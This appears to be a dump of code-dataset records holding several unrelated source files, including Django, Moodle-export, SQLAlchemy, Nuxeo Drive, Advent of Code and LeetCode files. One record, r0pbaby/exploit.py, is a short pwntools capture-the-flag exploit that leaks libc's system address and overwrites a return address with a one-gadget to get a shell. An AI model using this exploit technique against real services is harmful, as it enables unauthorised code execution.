action_object__workflow_state = 'live'\n # because django orm has no dynamic reverse relation\n casereport_ids = activity_stream_queryset.filter(\n public=True,\n action_object_content_type=casereport_ct,\n verb__exact = 'shared',\n target_content_type_id=my_ct,\n target_object_id=self.id).values_list('action_object_object_id', flat=True)\n logger.debug(\"shared crs %s\", list(casereport_ids))\n non_live_ids = CaseReport.objects.filter(\n id__in=list(casereport_ids)).exclude(\n workflow_state='live').values_list('id', flat=True)\n logger.debug(\"non live crs %s\", list(non_live_ids))\n activity_stream_queryset = activity_stream_queryset.exclude(\n action_object_content_type=casereport_ct,\n action_object_object_id__in=list(\n non_live_ids)) # would love to know why list was need here, but not in the query above.\n return activity_stream_queryset\n\n def get_documents_url(self):\n from django.core.urlresolvers import reverse\n return reverse(\n 'projects:projects_tab',\n kwargs={'pk': self.pk, 'slug': self.slug, 'tab': 'documents'},\n )\n\n def get_discussions_url(self):\n from django.core.urlresolvers import reverse\n return reverse(\n 'projects:projects_tab',\n kwargs={'pk': self.pk, 'slug': self.slug, 'tab': 'discussions'},\n )\n\n def get_bibliography_url(self):\n from django.core.urlresolvers import reverse\n return reverse(\n 'projects:projects_tab',\n kwargs={'pk': self.pk, 'slug': self.slug, 'tab': 'bibliography'},\n )\n\n def get_contact_email_addresses(self):\n emails = [\n pm.user.email for pm in\n ProjectMembership.objects.filter(state='moderator', project=self)\n ]\n emails += settings.REGISTRATION_REVIEWERS\n # One-off customization so that a single person could additionally be notified of 'approval required'\n # registrations, but only for projects that specifically require approval. 
We do NOT send to these recipients\n # if approval is required only because the user's email address didn't match their institution's domain.\n if self.approval_required:\n emails.extend(settings.REGISTRATION_REVIEWERS_FOR_APPROVAL_REQUIRED_PROJECTS)\n return emails\n\n def notify_members(self, subject, context, template='emails/notification'):\n # dead code?\n for membership in self.projectmembership_set.filter(user__is_active=True):\n send_transactional_mail(\n membership.user.email,\n subject,\n template,\n context\n )\n\n def save(self, *args, **kwargs):\n # Groups are in the top level navigation and need to clear the cache\n # on save.\n menu_pool.clear()\n super().save(*args, **kwargs)\n\n def active_members(self):\n return self.users.exclude(projectmembership__state__in=('pending',\n 'ignored',))\n\n def pending_members(self):\n return self.users.filter(projectmembership__state='pending')\n\n def moderators(self):\n return self.users.filter(projectmembership__state='moderator')\n\n def project_mods(self):\n mods = self.users.filter(projectmembership__state='moderator')\n return ' | '.join([x.get_full_name() for x in mods])\n\n def add_member(self, user, state=None, approver=None):\n \"\"\" add user to the project(group)\n if the user was already a member, no action is taken\n if the project requires membership approval, the user will be pending.\n otherwise a normal membership is made.\n\n Returns the ProjectMemebership ( pending, member, moderator )\n \"\"\"\n\n membership, is_new = ProjectMembership.objects.get_or_create(\n project=self,\n user=user,\n )\n\n if state:\n membership.state = state\n\n # if moderator approval isn't needed, approve the member now\n elif not self.approval_required:\n membership.state = 'member'\n\n if approver:\n membership.approver = approver\n\n membership.save()\n return membership\n\n def remove_member(self, user):\n \"\"\" remove user from the project.\n \"\"\"\n membership = self.projectmembership_set.get_or_create(user=user)\n membership.delete()\n\n\nfrom rlp.accounts.models import EMAIL_PREF_CHOICES as ALL_EMAIL_PREFS_CHOICES, DIGEST_PREF_CHOICES\nEMAIL_PREFS_CHOICES = [choice for choice in ALL_EMAIL_PREFS_CHOICES if choice[0] != 'user_only']\n\n\nclass ProjectMembership(models.Model):\n project = models.ForeignKey(Project)\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='projectmembership')\n state = FSMField(choices=MEMBER_STATES, default='pending')\n approver = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='approvals',\n null=True, blank=True)\n email_prefs = models.CharField(\n max_length=255,\n verbose_name='Email notification preferences for Groups',\n choices=EMAIL_PREFS_CHOICES,\n null=True,\n blank=True,\n )\n digest_prefs = models.CharField(\n max_length=255,\n verbose_name='Email digest preferences',\n choices=DIGEST_PREF_CHOICES,\n null=True,\n blank=True,\n )\n\n class Meta:\n unique_together = ['project', 'user']\n ordering = ['project']\n\n def __str__(self):\n return \"{user} is {state} of {project}\".format(user=self.user.email, state=self.state,\n project=self.project.title)\n\n @property\n def display_type(self):\n return \"{user}'s request to join {group}\".format(user=self.user, group=self.project)\n\n @transition(field=state, source='*', target='moderator')\n def promote(self):\n pass\n\n @transition(field=state, source='moderator', target='member')\n def demote(self):\n pass\n\n @transition(field=state, source='pending', target='member')\n def approve(self):\n # TODO: alert the user\n # 
activity stream entries for the user, the group and moderator\n # only log the approval if it wasn't automatic because the group was\n # open\n approver = CurrentUserMiddleware.get_user()\n self.approver = approver\n\n approval_action = Action(\n actor= self.user,\n verb='joined',\n action_object=self,\n target=self.project,\n )\n approval_action.save()\n\n @transition(field=state, source='pending', target='ignored')\n def ignore(self):\n approver = CurrentUserMiddleware.get_user()\n self.approver = approver\n\n # this is to inform the user\n request_declined = Action(actor=self.user,\n verb='declined',\n action_object=self,\n target=None)\n request_declined.save()\n","sub_path":"rlp/projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600076740","text":"from pwn import *\r\n\r\ndef get_libc():\r\n\tr.sendlineafter(\": \", '2')\r\n\tr.sendlineafter(\"symbol: \", \"system\")\r\n\tr.recvuntil(\"system: \")\r\n\treturn int(r.recv(18), 16) - l.functions[\"system\"].address\r\n\r\ndef fill_buffer(size, data):\r\n\tr.sendlineafter(\": \", '3')\r\n\tr.sendlineafter(\"(max 1024): \", str(size))\r\n\tr.sendline(data)\r\n\r\ndef exit():\r\n\tr.sendlineafter(\": \", '4')\r\n\tr.recv(1024)\r\n\r\nr = process(\"./r0pbaby\")\r\nl = r.libc\r\n\r\nlibc_base = get_libc()\r\noneshot = libc_base + 0xf0567\r\nlog.info(\"libc_base : \" + hex(libc_base))\r\n\r\npayload = 'A' * 8\r\npayload += p64(oneshot)\r\nfill_buffer(len(payload) + 1, payload)\r\nexit()\r\n\r\nr.interactive()","sub_path":"r0pbaby/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462627804","text":"from xml.dom.minidom import parse\nimport os\nimport re\nimport shutil\nfrom string import Template\nfrom lxml import etree\nfrom bs4 import BeautifulSoup as BS\nfrom bs4 import Comment\n\ndef prompt_from_html(html_filename, id):\n \"\"\"\n Search for a question or task prompt from the html file by ID\n \"\"\"\n with open(html_filename, encoding='utf-8') as fp:\n soup = BS(fp, 'html.parser')\n comments = soup.find_all(string=lambda text: isinstance(text, Comment))\n for c in comments:\n if c.split(' ')[2] == id:\n next_node = c.find_next_sibling('div')\n prompt = ''.join([str(i) for i in next_node.p.contents])\n return prompt\n\ndef natural_sort_key(s):\n \"\"\"\n Return a key for sorting a list containing subtasks in format [\"1a\", \"3d\", \"5c\", ...]\n \"\"\"\n return [int(text) if text.isdigit() else text.lower()\n for text in re.split(re.compile('([0-9]+)'), s)]\n\ndef getdict_userid_username():\n \"\"\"\n Make a dictionary to map from Moodle user IDs to user names\n \"\"\"\n dict_userid_username = {}\n userxml = os.path.join(\"backup\",\"users.xml\")\n docs = parse(userxml)\n users = docs.getElementsByTagName(\"user\")\n for user in users:\n userid = int(user.getAttribute(\"id\"))\n username = user.getElementsByTagName(\"username\")[0].firstChild.nodeValue\n dict_userid_username[userid] = username\n return dict_userid_username\n \ndef getdicts_question_task(prompt_source='xml', html_filename=None):\n \"\"\"\n Return:\n dict_q: dictionary from question number in quiz.txt (1,2,3,4,5...) to question number in moodle (1a,1b,2a,2b,2c...)\n dict_task_prompt: dictionary from task number in moodle (1,2,3,4...) 
to corresponding task prompt\n dict_question_prompt: dictionary from question number in moodle (1a,3c,6f...) to corresponding prompt\n \"\"\"\n dict_q = {}\n dict_task_prompt = {}\n dict_question_prompt = {}\n\n question_list = []\n qxml = os.path.join(\"backup\",\"questions.xml\")\n docs = parse(qxml)\n tasks = docs.getElementsByTagName(\"question_category\")\n for task in tasks:\n name = task.getElementsByTagName(\"name\")[0].firstChild.nodeValue\n if name.split(' ')[0] == \"Tehtävä\":\n tasknum = int(name.split(' ')[1])\n questions = task.getElementsByTagName(\"question\")\n for q in questions:\n id = q.getAttribute('id')\n if prompt_source == 'xml':\n prompt = q.getElementsByTagName(\"questiontext\")[0].firstChild.nodeValue # task_prompt.txt / prompt.txt\n elif prompt_source == 'html':\n prompt = prompt_from_html(html_filename, id)\n q_name = q.getElementsByTagName(\"name\")[0].firstChild.nodeValue\n if q_name.split(' ')[1].isdigit(): # Tehtävä X (1,2...)\n\n # In pilot test, tasks 3 and 8 do not have sub-tasks!!\n if tasknum == 3:\n dict_task_prompt[tasknum] = prompt\n dict_question_prompt[str(tasknum)+'a'] = '' # no need to duplicate the prompt\n question_list.append(str(tasknum)+'a')\n elif tasknum == 8:\n if q.getAttribute(\"id\") == \"3013\": # Tehtävä 8\n dict_task_prompt[tasknum] = prompt\n elif q.getAttribute(\"id\") == \"3014\": # Tehtävä 8a\n dict_question_prompt[str(tasknum)+'a'] = prompt\n question_list.append(str(tasknum)+'a')\n\n else:\n dict_task_prompt[tasknum] = prompt\n\n else: # Tehtävä Xx (1a,2f...)\n task_question = q_name.split(' ')[1]\n dict_question_prompt[task_question] = prompt\n question_list.append(task_question)\n question_list.sort(key=natural_sort_key)\n for i in range(len(question_list)):\n dict_q[i+1] = question_list[i]\n return dict_q, dict_task_prompt, dict_question_prompt\n\ndef make_dirs(dict_task_prompt, dict_question_prompt):\n \"\"\"\n Create folders for tasks and subtasks and adds prompts\n \"\"\"\n parent_dir = \"moodle_quiz\"\n if not os.path.isdir(parent_dir):\n os.mkdir(parent_dir)\n for tasknum in dict_task_prompt.keys():\n if not os.path.isdir(os.path.join(parent_dir,str(tasknum))):\n os.mkdir(os.path.join(parent_dir,str(tasknum)))\n with open(os.path.join(parent_dir,str(tasknum),'task_prompt.txt'), 'w', encoding='utf-8') as f:\n f.write(dict_task_prompt[tasknum])\n for qnum in dict_question_prompt.keys():\n if tasknum == int(qnum[:-1]):\n if not os.path.isdir(os.path.join(parent_dir,str(tasknum),qnum)):\n os.mkdir(os.path.join(parent_dir,str(tasknum),qnum))\n with open(os.path.join(parent_dir,str(tasknum),qnum,'prompt.txt'), 'w', encoding='utf-8') as f:\n f.write(dict_question_prompt[qnum])\n\ndef get_prompt_files():\n \"\"\"\n Extract auxilary prompt files (images & audio) to a separate folder\n \"\"\"\n hash2filename_dict = {}\n fxml = os.path.join(\"backup\",\"files.xml\")\n docs = parse(fxml)\n files = docs.getElementsByTagName(\"file\")\n\n # Find all files and corresponding real filenames\n for f in files:\n filetype = f.getElementsByTagName(\"mimetype\")[0].firstChild.nodeValue.split('/')[0]\n if filetype == 'audio' or filetype == 'image':\n filename = f.getElementsByTagName(\"filename\")[0].firstChild.nodeValue\n content_hash = f.getElementsByTagName(\"contenthash\")[0].firstChild.nodeValue\n hash2filename_dict[content_hash] = filename\n\n # Search for files, copy to propmt_files dir and rename\n filedir = os.path.join(\"backup\",\"files\")\n promptdir = \"prompt_files\"\n if not os.path.isdir(promptdir):\n 
os.mkdir(\"prompt_files\")\n for root, _, files in os.walk(filedir):\n for name in files:\n if name in hash2filename_dict:\n shutil.copy(os.path.join(root, name), os.path.join(promptdir, hash2filename_dict[name]))\n\ndef read_txt(filename):\n with open(filename, 'r', encoding='utf8') as file:\n txt = file.read()\n return str(txt)\n\ndef gen_rubric(txt, student, question, t_prompt, q_prompt, wavpath):\n s = Template(txt)\n tt = s.substitute(StudentID=student, QuestionID=question, TaskPrompt=t_prompt, QuestionPrompt=q_prompt, Wav_path=wavpath)\n return tt\n \n\ndef generate_quiz_xml(txt, task, ques_var, user, wav_path, task_prompt, question_prompt, quiz):\n \"\"\"Generate a Cloze-type Moodle question quiz\"\"\"\n \n question = etree.SubElement(quiz, \"question\", type=\"cloze\")\n name = etree.SubElement(question, \"name\")\n text = etree.SubElement(name, \"text\")\n text.text = f\"{task}_{ques_var}_{user}\"\n questiontext = etree.SubElement(question, \"questiontext\", format=\"html\")\n qtext = etree.SubElement(questiontext, \"text\")\n qtext.text = gen_rubric(txt, user, ques_var, read_txt(task_prompt), read_txt(question_prompt), wav_path)\n generalfeedback = etree.SubElement(question, \"generalfeedback\", format=\"html\")\n gb_text = etree.SubElement(generalfeedback, \"text\")\n penalty = etree.SubElement(question, \"penalty\")\n penalty.text = \"0.333\"\n hidden = etree.SubElement(question, \"hidden\")\n hidden.text = \"0\"\n idnumber = etree.SubElement(question, \"idnumber\")\n return quiz","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423312060","text":"from sqlalchemy import Column, Integer, String, ForeignKey\nfrom sqlalchemy.orm import relationship\n\nfrom app.main.model.tree_new_db.init_base import Base\n\n\nclass Staff(Base):\n __tablename__ = 'retail_staff'\n id = Column(Integer, primary_key=True)\n name = Column(String(50), nullable=False)\n\n\nclass Shop(Base):\n __tablename__ = 'retail_shop'\n id = Column(Integer, primary_key=True)\n name = Column(String(50), nullable=False)\n address = Column(String(100))\n manager_staff_id = Column(Integer, ForeignKey(Staff.id))\n staff_id = Column(Integer, ForeignKey(Staff.id))\n staff = relationship(Staff, backref='shop')\n\n\n","sub_path":"app/main/company/model/Retail.py","file_name":"Retail.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155212470","text":"import os\nimport logging\nimport datetime\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import Sequence\nfrom sqlalchemy import String\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import backref\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\n\nfrom nxdrive.client import NuxeoClient\nfrom nxdrive.client import LocalClient\n\ntry:\n from exceptions import WindowsError\nexcept ImportError:\n WindowsError = None # this will never be raised under unix\n\n\nlog = logging.getLogger(__name__)\n\n\n# make the declarative base class for the ORM mapping\nBase = declarative_base()\n\n\n__model_version__ = 1\n\n# Summary status from last known pair of states\n\nPAIR_STATES = {\n # regular cases\n ('unknown', 
'unknown'): 'unknown',\n    ('synchronized', 'synchronized'): 'synchronized',\n    ('created', 'unknown'): 'locally_created',\n    ('unknown', 'created'): 'remotely_created',\n    ('modified', 'synchronized'): 'locally_modified',\n    ('synchronized', 'modified'): 'remotely_modified',\n    ('modified', 'unknown'): 'locally_modified',\n    ('unknown', 'modified'): 'remotely_modified',\n    ('deleted', 'synchronized'): 'locally_deleted',\n    ('synchronized', 'deleted'): 'remotely_deleted',\n    ('deleted', 'deleted'): 'deleted',\n\n    # conflicts with automatic resolution\n    ('created', 'deleted'): 'locally_created',\n    ('deleted', 'created'): 'remotely_created',\n    ('modified', 'deleted'): 'locally_created',\n    ('deleted', 'modified'): 'remotely_created',\n\n    # conflict cases that need special handling\n    ('modified', 'modified'): 'conflicted',\n    ('created', 'created'): 'conflicted',\n}\n\n\nclass ServerBinding(Base):\n    __tablename__ = 'server_bindings'\n\n    local_folder = Column(String, primary_key=True)\n    server_url = Column(String)\n    remote_user = Column(String)\n    remote_password = Column(String)\n\n    def __init__(self, local_folder, server_url, remote_user,\n                 remote_password):\n        self.local_folder = local_folder\n        self.server_url = server_url\n        self.remote_user = remote_user\n        self.remote_password = remote_password\n\n\nclass RootBinding(Base):\n    __tablename__ = 'root_bindings'\n\n    local_root = Column(String, primary_key=True)\n    remote_repo = Column(String)\n    remote_root = Column(String)\n    local_folder = Column(String, ForeignKey('server_bindings.local_folder'))\n\n    server_binding = relationship(\n        'ServerBinding',\n        backref=backref(\"roots\", cascade=\"all, delete-orphan\"))\n\n    def __init__(self, local_root, remote_repo, remote_root):\n        local_root = os.path.abspath(local_root)\n        self.local_root = local_root\n        self.remote_repo = remote_repo\n        self.remote_root = remote_root\n\n        # expected local folder should be the direct parent of the local root\n        local_folder = os.path.abspath(os.path.join(local_root, '..'))\n        self.local_folder = local_folder\n\n    def __repr__(self):\n        return (\"<RootBinding local_root=%r, local_folder=%r, remote_repo=%r, remote_root=%r>\" % (self.local_root, self.local_folder,\n                self.remote_repo, self.remote_root))\n\n\nclass LastKnownState(Base):\n    \"\"\"Aggregate state aggregated from last collected events.\"\"\"\n    __tablename__ = 'last_known_states'\n\n    id = Column(Integer, Sequence('state_id_seq'), primary_key=True)\n    local_root = Column(String, ForeignKey('root_bindings.local_root'),\n                        index=True)\n    root_binding = relationship(\n        'RootBinding',\n        backref=backref(\"states\", cascade=\"all, delete-orphan\"))\n\n    # Timestamps to detect modifications\n    last_local_updated = Column(DateTime)\n    last_remote_updated = Column(DateTime)\n\n    # Save the digest too for better updates / moves detection\n    local_digest = Column(String, index=True)\n    remote_digest = Column(String, index=True)\n\n    # Path from root using unix separator, '/' for the root itself.\n    path = Column(String, index=True)\n    remote_path = Column(String) # for ordering only\n\n    # Remote reference (instead of path based lookup)\n    remote_ref = Column(String, index=True)\n\n    # Parent path from root / ref for fast children queries,\n    # can be None for the root itself.\n    parent_path = Column(String, index=True)\n    remote_parent_ref = Column(String, index=True)\n\n    # Names for fast alignment queries\n    local_name = Column(String, index=True)\n    remote_name = Column(String, index=True)\n\n    folderish = Column(Integer)\n\n    # Last known state based on event log\n    local_state = Column(String)\n    remote_state = Column(String)\n    pair_state = 
Column(String, index=True)\n\n # Track move operations to avoid loosing history\n locally_moved_from = Column(String)\n locally_moved_to = Column(String)\n remotely_moved_from = Column(String)\n remotely_moved_to = Column(String)\n\n def __init__(self, local_root, local_info=None, remote_info=None,\n local_state='unknown', remote_state='unknown'):\n self.local_root = local_root\n if local_info is None and remote_info is None:\n raise ValueError(\n \"At least local_info or remote_info should be provided\")\n\n if local_info is not None:\n self.update_local(local_info)\n if remote_info is not None:\n self.update_remote(remote_info)\n\n self.update_state(local_state=local_state, remote_state=remote_state)\n\n def update_state(self, local_state=None, remote_state=None):\n if local_state is not None:\n self.local_state = local_state\n if remote_state is not None:\n self.remote_state = remote_state\n pair = (self.local_state, self.remote_state)\n self.pair_state = PAIR_STATES.get(pair, 'unknown')\n\n def __repr__(self):\n return (\"LastKnownState\") % (\n os.path.basename(self.local_root),\n self.path, self.remote_name,\n self.local_state, self.remote_state)\n\n def get_local_client(self):\n return LocalClient(self.local_root)\n\n def get_remote_client(self, factory=None):\n if factory is None:\n factory = NuxeoClient\n rb = self.root_binding\n sb = rb.server_binding\n return factory(\n sb.server_url, sb.remote_user, sb.remote_password,\n base_folder=rb.remote_root, repository=rb.remote_repo)\n\n def refresh_local(self, client=None):\n \"\"\"Update the state from the local filesystem info.\"\"\"\n client = client if client is not None else self.get_local_client()\n local_info = client.get_info(self.path, raise_if_missing=False)\n self.update_local(local_info)\n return local_info\n\n def update_local(self, local_info):\n \"\"\"Update the state from pre-fetched local filesystem info.\"\"\"\n if local_info is None:\n if self.local_state in ('unknown', 'created', 'modified',\n 'synchronized'):\n # the file use to exist, it has been deleted\n self.update_state(local_state='deleted')\n self.local_digest = None\n return\n\n if self.path is None:\n self.path = local_info.path\n if self.path != '/':\n self.local_name = os.path.basename(local_info.path)\n parent_path, _ = local_info.path.rsplit('/', 1)\n self.parent_path = '/' if parent_path == '' else parent_path\n else:\n self.local_name = os.path.basename(self.local_root)\n self.parent_path = None\n\n if self.path != local_info.path:\n raise ValueError(\"State %r cannot be mapped to '%s%s'\" % (\n self, self.local_root, local_info.path))\n\n # Shall we recompute the digest from the current file?\n update_digest = self.local_digest == None\n\n if self.last_local_updated is None:\n self.last_local_updated = local_info.last_modification_time\n self.folderish = local_info.folderish\n update_digest = True\n\n elif local_info.last_modification_time > self.last_local_updated:\n self.last_local_updated = local_info.last_modification_time\n self.folderish = local_info.folderish\n if not self.folderish:\n # The time stamp of folderish folder seems to be updated when\n # children are added under Linux? 
Is this the same under OSX\n # and Windows?\n self.update_state(local_state='modified')\n update_digest = True\n\n if update_digest:\n try:\n self.local_digest = local_info.get_digest()\n except (IOError, WindowsError):\n # This can fail when another process is writing the same file\n # let's postpone digest computation in that case\n log.debug(\"Delaying local digest computation for %r\"\n \" due to possible concurrent file access.\",\n local_info.filepath)\n\n # XXX: shall we store local_folderish and remote_folderish to\n # detect such kind of conflicts instead?\n\n # else: nothing to do\n\n def refresh_remote(self, client=None):\n \"\"\"Update the state from the remote server info.\n\n Can reuse an existing client to spare some redundant client init HTTP\n request.\n \"\"\"\n client = client if client is not None else self.get_remote_client()\n fetch_parent_uid = self.path != '/'\n remote_info = client.get_info(self.remote_ref, raise_if_missing=False,\n fetch_parent_uid=fetch_parent_uid)\n self.update_remote(remote_info)\n return remote_info\n\n def update_remote(self, remote_info):\n \"\"\"Update the state from the pre-fetched remote server info.\"\"\"\n if remote_info is None:\n if self.remote_state in ('unknown', 'created', 'modified',\n 'synchronized'):\n self.update_state(remote_state='deleted')\n self.remote_digest = None\n return\n\n if self.remote_ref is None:\n self.remote_ref = remote_info.uid\n self.remote_parent_ref = remote_info.parent_uid\n self.remote_name = remote_info.name\n self.remote_path = remote_info.path\n\n if self.remote_ref != remote_info.uid:\n raise ValueError(\"State %r cannot be mapped to remote doc %r\" % (\n self, remote_info.name))\n\n if self.last_remote_updated is None:\n self.last_remote_updated = remote_info.last_modification_time\n self.remote_digest = remote_info.get_digest()\n self.folderish = remote_info.folderish\n self.remote_name = remote_info.name\n self.remote_path = remote_info.path\n\n elif remote_info.last_modification_time > self.last_remote_updated:\n self.last_remote_updated = remote_info.last_modification_time\n self.update_state(remote_state='modified')\n self.remote_digest = remote_info.get_digest()\n self.folderish = remote_info.folderish\n self.remote_name = remote_info.name\n self.remote_path = remote_info.path\n\n # else: nothing to update\n\n def get_local_abspath(self):\n relative_path = self.path[1:].replace('/', os.path.sep)\n return os.path.join(self.local_root, relative_path)\n\n\nclass FileEvent(Base):\n __tablename__ = 'fileevents'\n\n id = Column(Integer, Sequence('fileevent_id_seq'), primary_key=True)\n local_root = Column(String, ForeignKey('root_bindings.local_root'))\n utc_time = Column(DateTime)\n path = Column(String)\n\n root_binding = relationship(\"RootBinding\")\n\n def __init__(self, local_root, path, utc_time=None):\n self.local_root = local_root\n if utc_time is None:\n utc_time = datetime.utcnow()\n\n\ndef get_session_maker(nxdrive_home, echo=False):\n \"\"\"Return a session maker configured for using nxdrive_home\n\n The database is created in nxdrive_home if missing and the tables\n are intialized based on the model classes from this module (they\n all inherit the same abstract base class.\n \"\"\"\n # We store the DB as SQLite files in the nxdrive_home folder\n dbfile = os.path.join(os.path.abspath(nxdrive_home), 'nxdrive.db')\n engine = create_engine('sqlite:///' + dbfile, echo=echo)\n\n # Ensure that the tables are properly initialized\n Base.metadata.create_all(engine)\n return 
sessionmaker(bind=engine)\n\n\ndef get_scoped_session_maker(nxdrive_home, echo=False):\n    \"\"\"Return a session maker configured for using nxdrive_home\n\n    The database is created in nxdrive_home if missing and the tables\n    are initialized based on the model classes from this module (they\n    all inherit the same abstract base class).\n\n    Sessions built with this maker are reusable thread local\n    singletons.\n    \"\"\"\n    return scoped_session(get_session_maker(nxdrive_home, echo=echo))\n","sub_path":"nuxeo-drive-client/nxdrive/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433822256","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom itertools import product\n\n# %%\ndef parser(filename):\n    with open(filename) as f:\n        data = [[0 if s=='.' else 1 for s in line] for line in f.read().splitlines()]\n    return data\n\n# %%\ndef apply_conway_n_times(A, n):\n    dim = A.ndim # dimension\n    Z = np.pad(A, (1 + n)) # add enough border\n    N = np.zeros(Z.shape, dtype=int) # number of neighbors\n    center = (np.s_[1:-1],) * dim # core of the grid (no borders)\n\n    for _ in range(n):\n        # Compute the number of neighbors\n        N[...] = 0\n        for neigh_slice in product([np.s_[:-2], np.s_[1:-1], np.s_[2:]], repeat=dim):\n            if neigh_slice != center:\n                N[center] += Z[neigh_slice]\n\n        # Update the Conway grid\n        birth = (N == 3) & (Z == 0) # inactive cell with 3 neighbors becomes active\n        survive = ((N == 2) | (N == 3)) & (Z == 1) # active cell with 2 or 3 neig. stays active\n        Z[...] = 0\n        Z[birth | survive] = 1\n\n    return Z\n\n# %%\nif __name__ == \"__main__\":\n    from os.path import dirname, join, realpath\n    folder = join(dirname(dirname(realpath(__file__))), \"data\")\n    data = parser(f\"{folder}/day17.txt\")\n    n = len(data)\n\n    Z_3d = np.zeros((n,)*3, dtype=int)\n    Z_3d[n//2] = data\n\n    Z_4d = np.zeros((n,)*4, dtype=int)\n    Z_4d[n//2, n//2] = data\n\n    print(\"Part 1 —\", apply_conway_n_times(Z_3d, 6).sum())\n    print(\"Part 2 —\", apply_conway_n_times(Z_4d, 6).sum())\n\n","sub_path":"src/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"626334850","text":"\"\"\"\nGiven a string, find the length of the longest substring without repeating characters. For example, the longest substring\nwithout repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. For \"bbbbb\" the longest substring is \"b\", with\nthe length of 1.\n\"\"\"\n\n\nclass Solution(object):\n    def lengthOfLongestSubstring(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        \"\"\"\n        Two pointers, left and right, with a map storing each character's last index.\n        When the character at right is already in the map, move left just past its\n        previous position, then update the character's index in the map and compute max_len.\n        \"\"\"\n        if not s:\n            return 0\n\n        map_ = dict() # char -> index\n        max_len = 0\n\n        left = right = 0\n        while right < len(s):\n            if s[right] in map_:\n                left = max(left, map_[s[right]] + 1)\n            map_[s[right]] = right\n            max_len = max(max_len, right - left + 1)\n            right += 1\n        return max_len\n\n    def lengthOfLongestSubstring2(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        visited = [False] * 256\n        i, max_len = 0, 0\n        for j, char in enumerate(s):\n            while visited[ord(char)]:\n                visited[ord(s[i])] = False\n                i += 1\n            visited[ord(char)] = True\n            max_len = max(max_len, j - i + 1)\n        return max_len\n","sub_path":"Leetcode-Python/LongestSubstringWithoutRepeatingCharacters.py","file_name":"LongestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"452162481","text":"from collections import Counter\n\n\nclass Solution:\n    def getHint(self, secret: str, guess: str) -> str:\n        A = sum([secret[idx] == guess[idx] for idx in range(len(secret))])\n        secret_dist = Counter(secret)\n        guess_dict = Counter(guess)\n        B = sum([min(secret_dist[key], guess_dict[key]) for key in secret_dist])\n        return str(A) + \"A\" + str(B - A) + \"B\"\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.getHint(secret=\"1807\", guess=\"7810\"))\n    print(s.getHint(secret=\"1123\", guess=\"0111\"))\n","sub_path":"LeetCode30DaysChallenge-202009/Bulls and Cows.py","file_name":"Bulls and Cows.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313523841","text":"\"\"\"\njbonet @ boliva's lab 2013\n\"\"\"\nimport numpy as np\nfrom numpy import linalg as LA\nimport copy, sys\n\nclass SecondaryStructure(object):\n\n    min_ss_length = {'H':4, 'E':2, 'G':3}\n    max_ini_distance = {'H':8, 'E':2, 'G':6}\n    structure_regions = set(['H','G','E'])\n\n    def __init__(self, sstype, initposition):\n\n        self._sstype = sstype\n        self._inip = initposition\n        self._struct = None\n        self._endp = None\n        self._length = None\n        self._f11, self._cmf11, self._eigf11, self._tsf11 = None, None, None, None\n        self._f44, self._cmf44, self._eigf44, self._tsf44 = None, None, None, None\n\n    @property\n    def structure(self):\n        return self._struct\n\n    def get_moment_of_inertia_length(self, workp):\n        if workp == 'f11': (p1, p2) = (self._get_coordinate(self._f11), self._get_coordinate(self._endp))\n        elif workp == 'f44': (p1, p2) = (self._get_coordinate(self._inip), self._get_coordinate(self._f44) )\n        return p2 - p1 + 1\n\n    def _get_coordinate(self, identifier):\n        return self._struct._get_structure_array_coordinate(identifier)\n\n    def calculate_center_of_masses(self):\n        _struct = self._struct.duplicate(backbone = True)\n        if self.max_ini_distance[self._sstype] >= self._length:\n            self._f11 = self._inip\n            self._f44 = self._endp\n            self._cmf11 = _struct.geometric_center()\n            self._cmf44 = self._cmf11\n        else:\n            self._f11 = _struct.aminoacids[ len(_struct.aminoacids) - self.max_ini_distance[self._sstype] ].identifier\n            self._f44 = _struct.aminoacids[ self.max_ini_distance[self._sstype] - 1 ].identifier\n            self._cmf11 = _struct.extract(self._f11, self._endp).geometric_center()\n            self._cmf44 = _struct.extract(self._inip, self._f44).geometric_center()\n\n        self._jacobi_angles('f11')\n        if self._f11 != self._inip and self._f44 != self._endp:\n            self._jacobi_angles('f44')\n            if self._sstype == 'E': self._process_betas()\n        else:\n            self._eigf44 = self._eigf11
